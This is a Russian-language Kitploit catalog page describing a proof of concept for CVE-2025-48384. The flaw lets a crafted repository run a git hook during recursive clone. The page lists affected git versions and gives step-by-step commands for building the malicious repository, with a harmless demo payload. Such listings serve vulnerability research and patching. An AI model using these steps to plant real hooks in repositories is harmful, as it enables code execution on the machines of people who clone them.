Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-48384-poc — PoC для CVE-2025-48384 | Kitploit
Инструменты/GitHubGitHub/jacobholtz/cve-2025-48384-poc
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийСтатьи и ИсследованияОбучение и ОбразованиеРазработка Полезной Нагрузки
GitHubjacobholtz/cve-2025-48384-poc

CVE-2025-48384-poc

PoC для CVE-2025-48384

Репозиторий
11 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2025-48384-poc

CVE-2025-48384 представляет собой уязвимость неправильной обработки символических ссылок (следование по ссылкам) в git. В частности, имена файлов с символами возврата каретки неправильно обрабатываются в .git/config, и включение символической ссылки, указывающей на исполняемый файл хука git, находящийся в подмодуле, как директории хуков подмодуля, может привести к выполнению произвольного кода при клонировании репозитория с помощью git clone --recursive.

Git для Microsoft Windows не подвержен этой уязвимости, в основном уязвимыми остаются конкретные версии git на Linux и MacOS. Затронутые версии:

  • v2.50.0
  • v2.49.0
  • v2.48.0-v2.48.1
  • v2.47.0–v2.47.2
  • v2.46.0–v2.46.3
  • v2.45.0-v2.45.3
  • v2.44.0–v2.44.3
  • v2.43.6 и более ранние

Шаги для воспроизведения poc:

  1. Создайте два репозитория: poc и submodule
  2. В подмодуле создайте хук git post-checkout для выполнения кода при рекурсивном клонировании репозитория poc:
root@kitploit:~
#!/bin/bash
touch ~/hackedlol
  1. В репозитории poc добавьте репозиторий подмодуля с помощью git submodule add https://github.com/<your submodule repo>.git sub
Скачать инструмент
  • Добавьте символ возврата каретки в только что созданную папку sub с помощью git mv sub $(printf "sub\r")
  • Выполните echo printf "\tpath = \"sub\r\"\n" в .gitmodules и удалите исходный путь.
  • Создайте символическую ссылку на папку hooks в вашей локальной директории .git с помощью ln -s .git/modules/sub/hooks sub
  • Добавьте всё в репозиторий
  • Надеюсь, сработает lol
  • Источники

    • https://dgl.cx/2025/07/git-clone-submodule-cve-2025-48384
    • https://github.com/git/git/commit/05e9cd64ee23bbadcea6bcffd6660ed02b8eab89#diff-8fbc2654131392c3018ecfc92462057b3bdc675cc674084c248bb0393a46b59f